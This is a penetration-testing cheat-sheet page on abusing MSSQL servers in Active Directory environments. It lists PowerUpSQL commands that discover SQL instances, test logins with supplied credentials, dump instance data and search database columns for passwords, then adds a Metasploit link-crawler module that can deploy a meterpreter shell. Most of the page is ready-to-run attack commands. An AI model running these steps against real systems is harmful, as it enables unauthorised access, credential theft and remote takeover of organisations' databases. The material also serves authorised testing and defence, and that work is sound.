# MSSQL AD Abuse

### **MSSQL Enumeration / Discovery** <a href="#mssql-enumeration-discovery" id="mssql-enumeration-discovery"></a>

<figure><img src="https://3312882845-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FD5rqliIRJ8NoRpcxtWHk%2Fuploads%2FzZWbn3EadWwVhFc4SPLP%2Fimage.png?alt=media&#x26;token=66c2803d-0187-40b0-80db-68b3bc3235b8" alt=""><figcaption></figcaption></figure>

The PowerShell module [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) is very useful in this case.

Copy

```bash
Import-Module .\PowerupSQL.psd1
```

#### Enumerating from the network without domain session <a href="#enumerating-from-the-network-without-domain-session" id="enumerating-from-the-network-without-domain-session"></a>

{% code overflow="wrap" %}

```bash
# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo

#If you don't have an AD account, you can try to find MSSQL scanning via UDP
#First, you will need a list of hosts to scan
Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP –Verbose –Threads 10

#If you have some valid credentials and you have discovered valid MSSQL hosts you can try to login into them
#The discovered MSSQL servers must be on the file: C:\temp\instances.txt
Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test
```

{% endcode %}

#### Enumerating from inside the domain <a href="#enumerating-from-inside-the-domain" id="enumerating-from-inside-the-domain"></a>

{% code overflow="wrap" %}

```bash
# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo

#Get info about valid MSQL instances running in the domain
#This looks for SPNs that start with MSSQL (not always is a MSSQL running instance)
Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose 

#Test connections with each one
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -verbose

#Try to connect and obtain info from each MSSQL server (also useful to check connectivity)
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

# Get DBs, test connections and get info in Oneliner
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo
```

{% endcode %}

### &#x20; <a href="#mssql-basic-abuse" id="mssql-basic-abuse"></a>

### MSSQL Basic Abuse <a href="#mssql-basic-abuse" id="mssql-basic-abuse"></a>

#### Access DB <a href="#access-db" id="access-db"></a>

{% code overflow="wrap" %}

```bash
#Perform a SQL query
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select @@servername"

#Dump an instance (a lotof CVSs generated in current dir)
Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql"

# Search keywords in columns trying to access the MSSQL DBs
## This won't use trusted SQL links
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "password" -SampleSize 5 | select instance, database, column, sample | ft -autosize
```

{% endcode %}

### Metasploit

You can easily check for trusted links using Metasploit.

Copy

{% code overflow="wrap" %}

```batch
#Set username, password, windows auth (if using AD), IP...
msf> use exploit/windows/mssql/mssql_linkcrawler
[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session
```

{% endcode %}

Notice that Metasploit will try to abuse only the <mark style="color:orange;">**`openquery()`**</mark> function in MSSQL (so, if you can't execute a command with `openquery()` you will need to try the `EXECUTE` method **manually** to execute commands, see more below.)